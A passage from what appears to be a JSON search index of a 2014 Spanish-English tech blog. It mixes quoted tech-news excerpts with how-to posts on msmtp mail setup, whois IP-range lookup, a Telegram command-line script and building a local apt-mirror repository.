Harvard (Harvard Business School), se le ocurrió la idea de plasmar de forma electrónica lo que el profesor estaba haciendo en la pizarra. Éste, estaba dibujando una matriz con números en ciertas celdas y operaciones aritméticas en ciertas otras. Es decir, a Bricklin se le acababa de ocurrir la idea de crear una hoja de cálculo electrónica.\n» cyberhades.com\n","permalink":"http://karpoke.ignaciocano.com/2014/06/11/la-primera-hoja-de-calculo-para-pcs-cumple-35-anos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn la primavera de 1978 mientras que Dan Bricklin se sentaba en una de\nlas clases del Máster que se estaba sacando en la Escuela de\nEmpresariales de Harvard (Harvard Business School), se le ocurrió la\nidea de plasmar de forma electrónica lo que el profesor estaba\nhaciendo en la pizarra. Éste, estaba dibujando una matriz con números\nen ciertas celdas y operaciones aritméticas en ciertas otras. Es\ndecir, a Bricklin se le acababa de ocurrir la idea de crear una hoja\nde cálculo electrónica.\u003c/p\u003e","title":"La primera hoja de cálculo para PCs cumple 35 años"},{"content":" Since the FCC seems to have no problem with this idea, I’ve (through correspondence) gotten access to the FCC’s internal IP block, and throttled all connections from the FCC to 28.8kbps modem speeds on the Neocities.org front site, and I’m not removing it until the FCC pays us for the bandwidth they’ve been wasting instead of doing their jobs protecting us from the ”keep America’s internet slow and expensive forever” lobby.\n» kyledrake | neocities.org\n","permalink":"http://karpoke.ignaciocano.com/2014/06/05/we-are-rate-limiting-the-fcc-to-dialup-modem-speeds-until-they-pay-us-for-bandwidth/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSince the FCC seems to have no problem with this idea, I’ve (through\ncorrespondence) gotten access to the FCC’s internal IP block, and\nthrottled all connections from the FCC to 28.8kbps modem speeds on the\nNeocities.org front site, and I’m not removing it until the FCC pays\nus for the bandwidth they’ve been wasting instead of doing their jobs\nprotecting us from the ”keep America’s internet slow and expensive\nforever” lobby.\u003c/p\u003e","title":"We are rate limiting the FCC to dialup modem speeds until they pay us for bandwidth"},{"content":"Otra alternativa para enviar correos electrónicos desde el terminal sin necesidad de tener instalado un servidor de correo. Su configuración es incluso más sencilla que con ssmtp. Si tenemos instalado ssmtp deberemos desinstalarlo para poder instalar msmtp.\nInstalamos mstmp-mta Instalamos el paquete msmtp-mta desde los repositorios y editamos el fichero de configuración ~/.msmtprc:\ndefaults logfile ~/msmtp.log account gmail auth on host smtp.gmail.com from example@gmail.com auth on tls on tls_trust_file /usr/share/ca-certificates/mozilla/Equifax_Secure_CA.crt user example@gmail.com password secret port 587 account default : gmail Le cambiamos los permisos:\n$ chmod 600 ~/.msmtprc Instalamos mailx Utilizaremos el comando mail del paquete bsd-mailx, también disponible en los repositorios. (También serviría el comando del mismo nombre pero del paquete heirloom-mailx.)\nYa podemos probarlo:\necho Lorem impsum dolor | mail -s Subject to@example.com Referencias » Send Gmail from the Linux Command Line\n","permalink":"http://karpoke.ignaciocano.com/2014/06/04/configurar-msmtp-para-enviar-correo-mediante-gmail-desde-el-terminal/","summary":"\u003cp\u003eOtra alternativa para enviar correos electrónicos desde el terminal sin\nnecesidad de tener instalado un servidor de correo. Su configuración es\nincluso más sencilla que con \u003ca href=\"/2012/01/14/configurar-ssmtp-para-enviar-correo-mediante-gmail-desde-el-terminal/\"\u003essmtp\u003c/a\u003e. Si tenemos instalado \u003ccode\u003essmtp\u003c/code\u003e\ndeberemos desinstalarlo para poder instalar \u003ccode\u003emsmtp\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"instalamos-mstmp-mta\"\u003eInstalamos \u003ccode\u003emstmp-mta\u003c/code\u003e\u003c/h2\u003e\n\u003cp\u003eInstalamos el paquete \u003ccode\u003emsmtp-mta\u003c/code\u003e desde los repositorios y editamos el\nfichero de configuración \u003ccode\u003e~/.msmtprc\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003edefaults\nlogfile ~/msmtp.log\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eaccount gmail\nauth on\nhost smtp.gmail.com\nfrom example@gmail.com\nauth on\ntls on\ntls_trust_file /usr/share/ca-certificates/mozilla/Equifax_Secure_CA.crt\nuser example@gmail.com\npassword secret\nport 587\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eaccount default : gmail\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eLe cambiamos los permisos:\u003c/p\u003e","title":"Configurar msmtp para enviar correo mediante GMail desde el terminal"},{"content":" The American Standard Code for Information Interchange (ASCII) was developed under the auspices of a committee of the American Standards Association, called the X3 committee, by its X3.2 (later X3L2) subcommittee, and later by that subcommittee’s X3.2.4 working group. The ASA became the United States of America Standards Institute or USASI and ultimately the American National Standards Institute.\n» Charles Torvalds | askapache.com\n","permalink":"http://karpoke.ignaciocano.com/2014/06/01/ascii-chart/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe American Standard Code for Information Interchange (ASCII) was\ndeveloped under the auspices of a committee of the American Standards\nAssociation, called the X3 committee, by its X3.2 (later X3L2)\nsubcommittee, and later by that subcommittee’s X3.2.4 working group.\nThe ASA became the United States of America Standards Institute or\nUSASI and ultimately the American National Standards Institute.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Charles Torvalds | \u003ca href=\"http://www.askapache.com/linux/ascii-codes-and-reference.html\"\u003easkapache.com\u003c/a\u003e\u003c/p\u003e","title":"ASCII Chart"},{"content":"Si queremos obtener el listado de rangos de IPs que puedan estar asociadas a un dominio, por ejemplo para bloquearlo, podemos ejecutar:\n$ IP=$(dig +short www.example.com | grep -Eo \u0026#39;([0-9]{1,3}\\.?){4}\u0026#39; | head -1) $ AS=$(whois $IP | awk \u0026#39;/OriginAS/{print $2}\u0026#39;) $ test -n \u0026#34;$AS\u0026#34; \u0026amp;\u0026amp; whois -h whois.radb.net \u0026#39;!g\u0026#39;$AS | tr -d \u0026#34;\\n\u0026#34; | tr \u0026#34; \u0026#34; \u0026#34;\\n\u0026#34; | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 En la primera línea, obtenemos la IP asociada al dominio. En la segunda, obtenemos el registro origin, el cual utilizamos en la tercera línea para consultar a whois.radb.net el rango de IPs y mostrar las IPs una por línea.\nEsto nos da el listado de IPs v4, si queremos las IPs v6, podemos modificar ligeramente la tercera línea:\n$ whois -h whois.radb.net -- \u0026#34;-i origin $AS\u0026#34; | awk \u0026#39;/^route6:/{print $2}\u0026#39; Referencias » How can I list all IPs relating to a single AS?\n","permalink":"http://karpoke.ignaciocano.com/2014/06/01/obtener-el-listado-de-rangos-de-ips-asociados-a-un-dominio/","summary":"\u003cp\u003eSi queremos obtener el listado de rangos de IPs que puedan estar\nasociadas a un dominio, por ejemplo para bloquearlo, podemos ejecutar:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ IP=$(dig +short www.example.com | grep -Eo \u0026#39;([0-9]{1,3}\\.?){4}\u0026#39; | head -1)\n$ AS=$(whois $IP | awk \u0026#39;/OriginAS/{print $2}\u0026#39;)\n$ test -n \u0026#34;$AS\u0026#34; \u0026amp;\u0026amp; whois -h whois.radb.net \u0026#39;!g\u0026#39;$AS | tr -d \u0026#34;\\n\u0026#34; | tr \u0026#34; \u0026#34; \u0026#34;\\n\u0026#34; | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn la primera línea, obtenemos la IP asociada al dominio. En la segunda,\nobtenemos el registro \u003cem\u003eorigin\u003c/em\u003e, el cual utilizamos en la tercera línea\npara consultar a whois.radb.net el rango de IPs y mostrar las IPs una\npor línea.\u003c/p\u003e","title":"Obtener el listado de rangos de IPs asociados a un dominio"},{"content":" The roots of CGI lie in the first mechanical aids to drawing and painting. The earliest of these were developed to help solve a problem every artist has found to be sticky: perspective. Before the introduction of geometric perspective, the realistic depiction of nature was not one of the purposes of art. Instead, artists chose the size and position of objects in a picture by their relative importance to one another. A distant castle might appear to be larger than one in the foreground simply because it was considered more important.\n» Ron Miller | io9.com\n","permalink":"http://karpoke.ignaciocano.com/2014/05/31/the-forgotten-history-of-cgi/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe roots of CGI lie in the first mechanical aids to drawing and\npainting. The earliest of these were developed to help solve a problem\nevery artist has found to be sticky: perspective. Before the\nintroduction of geometric perspective, the realistic depiction of\nnature was not one of the purposes of art. Instead, artists chose the\nsize and position of objects in a picture by their relative importance\nto one another. A distant castle might appear to be larger than one in\nthe foreground simply because it was considered more important.\u003c/p\u003e","title":"The Forgotten History Of CGI"},{"content":" I remember my first program, by which I mean one that I cobbled together myself, not simply typing in a complete listing from the manual. I was twelve, the year was 1985, and the computer a Texas Instruments TI-99/4A (a machine which was actually the first 16-bit home computer). My program was a very simple text adventure game, created by chaining together as many IF¦ THEN GOTO statements as I had patience for.\n» Stephen Cass | spectrum.ieee.org\n","permalink":"http://karpoke.ignaciocano.com/2014/05/31/the-golden-age-of-basic/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI remember my first program, by which I mean one that I cobbled\ntogether myself, not simply typing in a complete listing from the\nmanual. I was twelve, the year was 1985, and the computer a Texas\nInstruments TI-99/4A (a machine which was actually the first 16-bit\nhome computer). My program was a very simple text adventure game,\ncreated by chaining together as many IF¦ THEN GOTO statements as I had\npatience for.\u003c/p\u003e","title":"The Golden Age of Basic"},{"content":" Every friend I have with a job that involves picking up something heavier than a laptop more than twice a week eventually finds a way to slip something like this into conversation: ”Bro,1 you don’t work hard. I just worked a 4700-hour week digging a tunnel under Mordor with a screwdriver.” They have a point. Mordor sucks, and it’s certainly more physically taxing to dig a tunnel than poke at a keyboard unless you’re an ant. But, for the sake of the argument, can we agree that stress and insanity are bad things? Awesome. Welcome to programming.\n» Peter Welch | stilldrinking.org\n","permalink":"http://karpoke.ignaciocano.com/2014/05/31/programming-sucks/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEvery friend I have with a job that involves picking up something\nheavier than a laptop more than twice a week eventually finds a way to\nslip something like this into conversation: ”Bro,1 you don’t work\nhard. I just worked a 4700-hour week digging a tunnel under Mordor\nwith a screwdriver.” They have a point. Mordor sucks, and it’s\ncertainly more physically taxing to dig a tunnel than poke at a\nkeyboard unless you’re an ant. But, for the sake of the argument, can\nwe agree that stress and insanity are bad things? Awesome. Welcome to\nprogramming.\u003c/p\u003e","title":"Programming Sucks"},{"content":"Utilizando tg, podemos enviar y recibir mensajes de nuestros contactos en Telegram, incluyéndonos a nosotros mismos, desde el terminal.\nEnvíos programados Combinándolo con expect, conseguiremos una forma sencilla de programar notificaciones.\nHe aquí un pequeño ejemplo:\n#!/usr/bin/env bash function tg { # First argument, if any, must be the receiver local to=\u0026#34;$1\u0026#34; local msg=\u0026#34;\u0026#34; local cmd=\u0026#34;\u0026#34; if [ $# -gt 1 ]; then shift 1 msg=\u0026#34;$@\u0026#34; else while read line; do if [ -z \u0026#34;$msg\u0026#34; ]; then msg=$line else msg=\u0026#34;$msg\\n$line\u0026#34; fi done if [ -z \u0026#34;$to\u0026#34; ]; then to=$(awk \u0026#39;{print $1}\u0026#39; \u0026lt;\u0026lt;\u0026lt; $msg) msg=$(awk \u0026#39;{$1=\u0026#34;\u0026#34;;print $0}\u0026#39; \u0026lt;\u0026lt;\u0026lt; $msg) fi fi if [[ $msg =~ \u0026#34;\\n\u0026#34; ]]; then file=$(mktemp) echo -e \u0026#34;$msg\u0026#34; \u0026gt; $file cmd=\u0026#34;send_text $to $file\u0026#34; else cmd=\u0026#34;msg $to $msg\u0026#34; fi #echo $cmd expect -c \u0026#34; log_user 0 match_max 100000 spawn /path/to/telegram -k /path/to/tg-server.pub expect \\\u0026#34;User \\\u0026#34; send -- \\\u0026#34;$cmd\\r\\\u0026#34; expect \\\u0026#34;Sent\\\u0026#34; send \\\u0026#34;quit\\\u0026#34; \u0026#34; } tg $@ Algunos ejemplos de uso:\n# Pasando todos los argumentos directamente $ tg.sh NombreContacto Lorem impsum dolor sit amet # Pasando todos los argumentos desde una tubería $ echo NombreContacto Lorem impsum dolor sit amet | tg.sh # Pasando el contacto a la función y el mensaje desde una tubería $ echo Lorem impsum dolor sit amet | tg.sh NombreContacto # Pasando el resultado de un comando $ ls | tg.sh NombreContacto Un problema que nos encontraremos es que si enviamos los mensajes al mismo contacto con el que hemos registrado la aplación al instalarla, recibiremos el mensaje directamente como leído y no nos lo notificará.\nEn lugar de utilizar expect, tenemos otras alternativas:\nUtilizando el propio telegram El propio cliente acepta el parámetro -W que se puede utilizar para enviar mensajes:\n$ echo -e \u0026#34;msg NombreContacto Lorem impsum dolor sit amet\\rquit\u0026#34; | telegram -W Utilizando screen Podemos dejar el cliente en ejecución en una sesión de screen y enviar comandos desde otra:\n$ screen -dmS session_id telegram $ screen -S session_id -X eval \u0026#34;stuff \u0026#39;msg NombreContacto Lorem impsum dolor sit amet\u0026#39;\\r\u0026#34; Utilizando tuberías Podemos crear una tubería que alimente el cliente y enviar comandos a través de ella:\n$ mkfifo in $ telegram /dev/null \u0026amp; $ echo \u0026gt; in $ echo \u0026#34;msg NombreContacto Lorem impsum dolor sit amet\u0026#34; \u0026gt; in Notificación de mensajes nuevos Este cliente permite utilizar scripts en LUA, de tal manera que podemos llevar a cabo acciones para todo tipo de eventos. Por ejemplo, podemos ejecutar el comando notify-send cada vez que nos llega un mensaje, para que nos aparezca una notificación en pantalla.\nSu uso es sencillo. Nos bajamos el script, cortesía de AleixDev, y ejecutamos:\n$ telegram -s /path/to/notify.lua ","permalink":"http://karpoke.ignaciocano.com/2014/05/31/enviar-y-reicibir-notificaciones-de-telegram-desde-la-linea-de-comandos/","summary":"\u003cp\u003eUtilizando \u003ca href=\"http://github.com/vysheng/tg\"\u003etg\u003c/a\u003e, podemos enviar y recibir mensajes de nuestros\ncontactos en Telegram, incluyéndonos a nosotros mismos, desde el\nterminal.\u003c/p\u003e\n\u003ch2 id=\"envíos-programados\"\u003eEnvíos programados\u003c/h2\u003e\n\u003cp\u003eCombinándolo con \u003ccode\u003eexpect\u003c/code\u003e, conseguiremos una forma sencilla de programar\nnotificaciones.\u003c/p\u003e\n\u003cp\u003eHe aquí un pequeño ejemplo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e#!/usr/bin/env bash\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003efunction tg {\n    # First argument, if any, must be the receiver\n    local to=\u0026#34;$1\u0026#34;\n    local msg=\u0026#34;\u0026#34;\n    local cmd=\u0026#34;\u0026#34;\n    if [ $# -gt 1 ]; then\n        shift 1\n        msg=\u0026#34;$@\u0026#34;\n    else\n        while read line; do\n            if [ -z \u0026#34;$msg\u0026#34; ]; then\n                msg=$line\n            else\n                msg=\u0026#34;$msg\\n$line\u0026#34;\n            fi\n        done\n        if [ -z \u0026#34;$to\u0026#34; ]; then\n            to=$(awk \u0026#39;{print $1}\u0026#39; \u0026lt;\u0026lt;\u0026lt; $msg)\n            msg=$(awk \u0026#39;{$1=\u0026#34;\u0026#34;;print $0}\u0026#39; \u0026lt;\u0026lt;\u0026lt; $msg)\n        fi\n    fi\n    if [[ $msg =~ \u0026#34;\\n\u0026#34; ]]; then\n        file=$(mktemp)\n        echo -e \u0026#34;$msg\u0026#34; \u0026gt; $file\n        cmd=\u0026#34;send_text $to $file\u0026#34;\n    else\n        cmd=\u0026#34;msg $to $msg\u0026#34;\n    fi\n    #echo $cmd\n    expect -c \u0026#34;\n        log_user 0\n        match_max 100000\n        spawn /path/to/telegram -k /path/to/tg-server.pub\n        expect \\\u0026#34;User \\\u0026#34;\n        send -- \\\u0026#34;$cmd\\r\\\u0026#34;\n        expect \\\u0026#34;Sent\\\u0026#34;\n        send \\\u0026#34;quit\\\u0026#34;\n    \u0026#34;\n}\ntg $@\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eAlgunos ejemplos de uso:\u003c/p\u003e","title":"Enviar y reicibir notificaciones de Telegram desde la línea de comandos"},{"content":" Programming is social, too. Most people think it’s not. With assistance from media portrayals of programmers and sloppy stereotypes of our own, they think most of us would prefer to work alone in the dark. Some do, of course, but even then most programmers I know like to talk shop with other programmers all the time. They like to talk about the places where they are stuck, as well as the places they used to be stuck. War stories are the currency of the programmer community.\n» Eugene Wallingford | [][][cs.uni.edu][]\n[]: http://www.cs.uni.edu/~wallingf/blog/archives/monthly/2014-05.html#e2014-05-30T16_09_12.htm [cs.uni.edu]: http://www.cs.uni.edu\n","permalink":"http://karpoke.ignaciocano.com/2014/05/31/programming-is-social/","summary":"\u003cblockquote\u003e\n\u003cp\u003eProgramming is social, too. Most people think it’s not. With\nassistance from media portrayals of programmers and sloppy stereotypes\nof our own, they think most of us would prefer to work alone in the\ndark. Some do, of course, but even then most programmers I know like\nto talk shop with other programmers all the time. They like to talk\nabout the places where they are stuck, as well as the places they used\nto be stuck. War stories are the currency of the programmer community.\u003c/p\u003e","title":"Programming is social"},{"content":" Yan Zhu, a staff technologist at the Electronic Frontier Foundation, came to that determination after noticing that WordPress servers send a key browser cookie in plain text, rather than encrypting it, as long mandated by widely accepted security practices. The cookie, which carries the tag ”wordpress_logged_in,” is set once an end user has entered a valid WordPress user name and password. It’s the website equivalent of a plastic bracelets used by nightclubs. Once a browser presents the cookie, WordPress servers will usher the user behind a velvet rope to highly privileged sections that reveal private messages, update some user settings, publish blog posts, and more. The move by WordPress engineers to allow the cookie to be transmitted unencrypted makes them susceptible to interception in many cases.\n» Dan Goodin | arstechnica.com\n","permalink":"http://karpoke.ignaciocano.com/2014/05/26/unsafe-cookies-leave-wordpress-accounts-open-to-hijacking-2-factor-bypass/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYan Zhu, a staff technologist at the Electronic Frontier Foundation,\ncame to that determination after noticing that WordPress servers send\na key browser cookie in plain text, rather than encrypting it, as long\nmandated by widely accepted security practices. The cookie, which\ncarries the tag ”wordpress_logged_in,” is set once an end user has\nentered a valid WordPress user name and password. It’s the website\nequivalent of a plastic bracelets used by nightclubs. Once a browser\npresents the cookie, WordPress servers will usher the user behind a\nvelvet rope to highly privileged sections that reveal private\nmessages, update some user settings, publish blog posts, and more. The\nmove by WordPress engineers to allow the cookie to be transmitted\nunencrypted makes them susceptible to interception in many cases.\u003c/p\u003e","title":"Unsafe cookies leave WordPress accounts open to hijacking, 2-factor bypass"},{"content":" Welcome to the most unnecessarily complicated netcat album release format yet. In this repository, you will be able to compile your own kernel module, create a /dev/netcat device and redirect its output into an audio player (tested with mplayer and play from SoX as well).\nogg123 - \u0026lt; /dev/netcat ;\u0026rsquo; Brandon Lucia, Andrew Olmstead, and David Balatero github.com\n","permalink":"http://karpoke.ignaciocano.com/2014/05/25/netcat-cycles-per-instruction/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWelcome to the most unnecessarily complicated netcat album release\nformat yet. In this repository, you will be able to compile your own\nkernel module, create a /dev/netcat device and redirect its output\ninto an audio player (tested with mplayer and play from SoX as well).\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e ogg123 - \u0026lt; /dev/netcat\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e;\u0026rsquo; Brandon Lucia, Andrew Olmstead, and David Balatero \u003ca href=\"https://github.com/usrbinnc/netcat-cpi-kernel-module\"\u003egithub.com\u003c/a\u003e\u003c/p\u003e","title":"netcat - Cycles Per Instruction"},{"content":" Android apps can take photos with your phone in background phones without displaying any notification and you won’t see the app on the list of installed applications. App can send the photos over the internet to their private server. You can also find video with demo in this post.\n» Szymon Sidor | snacksforyourmind.blogspot.co.uk\n","permalink":"http://karpoke.ignaciocano.com/2014/05/25/exploring-limits-of-covert-data-collection-on-android-apps-can-take-photos-with-your-phone-without-you-knowing/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAndroid apps can take photos with your phone in background phones\nwithout displaying any notification and you won’t see the app on the\nlist of installed applications. App can send the photos over the\ninternet to their private server. You can also find video with demo in\nthis post.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Szymon Sidor | \u003ca href=\"http://snacksforyourmind.blogspot.co.uk/2014/05/exploring-limits-of-covert-data.html\"\u003esnacksforyourmind.blogspot.co.uk\u003c/a\u003e\u003c/p\u003e","title":"Exploring limits of covert data collection on Android: apps can take photos with your phone without you knowing"},{"content":"Bash 2048 v1.1 (https://github.com/mydzor/bash2048) pieces=16 target=2048 score=2884 /------|------|------|------\\ | 4 | 2 | 8 | 4 | |------|------|------|------| | 2 | 16 | 256 | 32 | |------|------|------|------| | 16 | 32 | 16 | 2 | |------|------|------|------| | 2 | 8 | 128 | 4 | \\------|------|------|------/ GAME OVER Your score: 2884 You have lost, better luck next time. ;\u0026rsquo; mydzor github.com\n","permalink":"http://karpoke.ignaciocano.com/2014/05/24/bash-implementation-of-2048-game/","summary":"\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eBash 2048 v1.1 (https://github.com/mydzor/bash2048) pieces=16 target=2048 score=2884\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e/------|------|------|------\\\n|    4 |    2 |    8 |    4 |\n|------|------|------|------|\n|    2 |   16 |  256 |   32 |\n|------|------|------|------|\n|   16 |   32 |   16 |    2 |\n|------|------|------|------|\n|    2 |    8 |  128 |    4 |\n\\------|------|------|------/\nGAME OVER\nYour score: 2884\nYou have lost, better luck next time.\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e;\u0026rsquo; mydzor \u003ca href=\"https://github.com/mydzor/bash2048\"\u003egithub.com\u003c/a\u003e\u003c/p\u003e","title":"Bash implementation of 2048 game"},{"content":" Belky es el ”sysop” (administrador) de VampireBBS. Anda estos días muy contento porque ha puesto de nuevo en marcha su vieja BBS. 32 personas accedieron al sistema nada más inaugurarlo, lo que en este prehistórico mundo es un éxito. Las BBS fueron, en la década de los 80 y 90, la Internet de la gente de la calle, la red a la medida humana, precursoras de todo lo que vendría después y centros de aprendizaje para muchos programadores, administradores y, en general, hackers. Hoy quedan muy pocas en pie, sólo tres en España, pero están decididas a no morir.\n;\u0026rsquo; Mercë Molist elmundo.com\n","permalink":"http://karpoke.ignaciocano.com/2014/05/24/aunque-parezca-mentira-siguen-existiendo-bbs/","summary":"\u003cblockquote\u003e\n\u003cp\u003eBelky es el ”sysop” (administrador) de VampireBBS. Anda estos días muy\ncontento porque ha puesto de nuevo en marcha su vieja BBS. 32 personas\naccedieron al sistema nada más inaugurarlo, lo que en este\nprehistórico mundo es un éxito. Las BBS fueron, en la década de los 80\ny 90, la Internet de la gente de la calle, la red a la medida humana,\nprecursoras de todo lo que vendría después y centros de aprendizaje\npara muchos programadores, administradores y, en general, hackers. Hoy\nquedan muy pocas en pie, sólo tres en España, pero están decididas a\nno morir.\u003c/p\u003e","title":"Aunque parezca mentira, siguen existiendo BBS"},{"content":" A breakthrough has been made in SSD technology that could mean drastic performance increases due to the overcoming of one of the major issues in the memory type. Currently, data cannot be directly overwritten onto the NAND chips used in the devices. Files must be written to a clean area of the drive whilst the old area is formatted. This eventually causes fragmented data and lowers the drive’s life and performance over time.\n» James Walker neowin.net\n","permalink":"http://karpoke.ignaciocano.com/2014/05/24/ssd-breakthrough-means-300-speed-boost-60-less-power-usage-even-on-old-drives/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA breakthrough has been made in SSD technology that could mean drastic\nperformance increases due to the overcoming of one of the major issues in the\nmemory type. Currently, data cannot be directly overwritten onto the NAND\nchips used in the devices. Files must be written to a clean area of the drive\nwhilst the old area is formatted. This eventually causes fragmented data and\nlowers the drive’s life and performance over time.\u003c/p\u003e","title":"SSD breakthrough means 300% speed boost, 60% less power usage... even on old drives"},{"content":" On a standard headphone plug, the left channel comes through the outer ”tip” contact, the right channel through the middle ”ring” contact, and the ground connection through the inner ”sleeve” contact. The acronym for these so-called ”tip-ring-sleeve” connectors is where TRS Drawbot gets its name. It has no microchips or circuit boards and uses free software to turn line graphics into sound files that make almost any audio device into an on-the-go robot controller.\n» Sean Michael Tragan and Mikal Hart | TRS Drawbot\n","permalink":"http://karpoke.ignaciocano.com/2014/05/24/trs-drawbot/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOn a standard headphone plug, the left channel comes through the outer\n”tip” contact, the right channel through the middle ”ring” contact,\nand the ground connection through the inner ”sleeve” contact. The\nacronym for these so-called ”tip-ring-sleeve” connectors is where TRS\nDrawbot gets its name. It has no microchips or circuit boards and uses\nfree software to turn line graphics into sound files that make almost\nany audio device into an on-the-go robot controller.\u003c/p\u003e","title":"TRS Drawbot"},{"content":" One comment’s answer was ’marketing’, which in a sense is correct; one reason we call Java a compiled language is that that’s what Sun called it from the start. Another comment noted that Java has an explicit compilation phase that is separate from having the JVM execute your Java program by interpreting the bytecodes. All of this points us towards what I feel is the real answer:\nIn Java, bytecode is a first class object. In Python it’s an internal implementation detail.\n» Chris Siebenmann | utcc.utoronto.ca\n","permalink":"http://karpoke.ignaciocano.com/2014/05/24/why-java-is-a-compiled-language-and-python-is-not/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOne comment’s answer was ’marketing’, which in a sense is correct; one\nreason we call Java a compiled language is that that’s what Sun called\nit from the start. Another comment noted that Java has an explicit\ncompilation phase that is separate from having the JVM execute your\nJava program by interpreting the bytecodes. All of this points us\ntowards what I feel is the real answer:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eIn Java, bytecode is a first class object. In Python it’s an\ninternal implementation detail.\u003c/p\u003e","title":"Why Java is a compiled language and Python is not"},{"content":" The inline JavaScript solution has a subtle, but very important (and an often overlooked) performance gotcha: inline scripts block on CSSOM before they are executed. Why? The browser does not know what the inline block is planning to do in the script it is about to execute, and because JavaScript can access and manipulate the CSSOM, it blocks and waits until the CSS is downloaded, parsed, and the CSSOM is constructed and available.\n» Ilya Grigorik | Script-injected \u0026ldquo;async scripts\u0026rdquo; considered harmful\n\u0026#34;Script-injected \u0026#34;async scripts\u0026#34; considered harmful\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2014/05/23/script-injected-async-scripts-considered-harmful/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe inline JavaScript solution has a subtle, but very important (and\nan often overlooked) performance gotcha: inline scripts block on CSSOM\nbefore they are executed. Why? The browser does not know what the\ninline block is planning to do in the script it is about to execute,\nand because JavaScript can access and manipulate the CSSOM, it blocks\nand waits until the CSS is downloaded, parsed, and the CSSOM is\nconstructed and available.\u003c/p\u003e","title":"Script-injected ”async scripts” considered harmful"},{"content":"Si tenemos un gran número de equipos con Ubuntu en nuestra LAN, nos puede interesar tener un espejo local del repositorio de paquetes de Ubuntu. Una diferencia entre esta opción y utilizar un proxy/caché de paquetes es que, en el primer caso, ya tendremos todos los paquetes disponibles cuando los vayamos a necesitar.\nClonar el repositorio en local Para crear un repositorio local, podemos usar el comando apt-mirror, disponible en los repositorios. Una vez instalado, podemos editar el fichero de configuración en /etc/apt/mirror.list para, por ejemplo, cambiar el directorio donde se guardarán los paquetes (por defecto /var/spool/apt-mirror), añadir o eliminar fuentes a incluir en el repositorio, etc. Con las fuentes por defecto, hay que tener en cuenta que serán necesarios más de 100 GB para alojar el repositorio. Si optásemos sólo por incluir el \u0026ldquo;main\u0026rdquo;, se queda en 10 GB.\nLuego, lo ejecutamos:\n$ sudo apt-mirror Downloading 162 index files using 20 threads... Begin time: Sat May 17 12:31:22 2014 [20]... [19]... [18]... [17]... [16]... [15]... [14]... [13]... [12]... [11]... [10]... [9]... [8]... [7]... [6]... [5]... [4]... [3]... [2]... [1]... [0]... End time: Sat May 17 12:32:02 2014 Processing tranlation indexes: [TTT] Downloading 185 translation files using 20 threads... Begin time: Sat May 17 12:32:02 2014 [20]... [19]... [18]... [17]... [16]... [15]... [14]... [13]... [12]... [11]... [10]... [9]... [8]... [7]... [6]... [5]... [4]... [3]... [2]... [1]... [0]... End time: Sat May 17 12:33:13 2014 Processing indexes: [SSSPPP] 110.1 GiB will be downloaded into archive. Downloading 111238 archive files using 20 threads... Begin time: Sat May 17 12:33:28 2014 [20]... Actualizar el repositorio local Para mantener el repositorio actualizado, bastará editar el fichero de configuración del cron para que se ejecute periódicamente:\n$ sudo vim /etc/cron.d/apt-mirror 0 4 * * * apt-mirror /usr/bin/apt-mirror \u0026gt; /var/spool/apt-mirror/var/cron.log Actualizaciones del propio servidor Si queremos que el propio servidor utilice el espejo local, deberemos cambiar las fuentes del /etc/apt/sources.list para que, en lugar de consultar el repositorio remoto, consulte el fichero local. Algo, así:\n#deb http://archive.ubuntu.com/ubuntu/ trusty main universe deb file:/var/spool/apt-mirror/mirror/archive.ubuntu.com/ubuntu trusty main universe Configurar el servidor web Por último, sólo queda que el repositorio sea accesible para los clientes a través del servidor web. En este caso, crearemos un nuevo host virtual para Apache2, por ejemplo, /etc/apache2/sites-available/deb.example.com.conf:\nServerName deb.example.com DocumentRoot /var/spool/apt-mirror/mirror/archive.ubuntu.com Options Indexes FollowSymLinks MultiViews AllowOverride Limit Options FileInfo Indexes Require all granted ErrorLog ${APACHE_LOG_DIR}/deb.example.com-error.log CustomLog ${APACHE_LOG_DIR}/deb.example.com-access.log combined # vim: syntax=apache ts=4 sw=4 sts=4 sr noet Lo activamos y reiniciamos apache:\n$ sudo a2ensite deb.example.com.conf $ sudo apache2ctl configtest \u0026amp;\u0026amp; sudo apache2ctl graceful Si todo ha ido bien, veremos dos directorios listados en la URL http://deb.example.com/ubuntu/.\nConfiguración de los clientes Para que el resto de equipos comiencen a utilizar el repositorio local, deberemos editar el fichero de fuentes (/etc/apt/sources.list) y sustituir las que había por las del repositorio 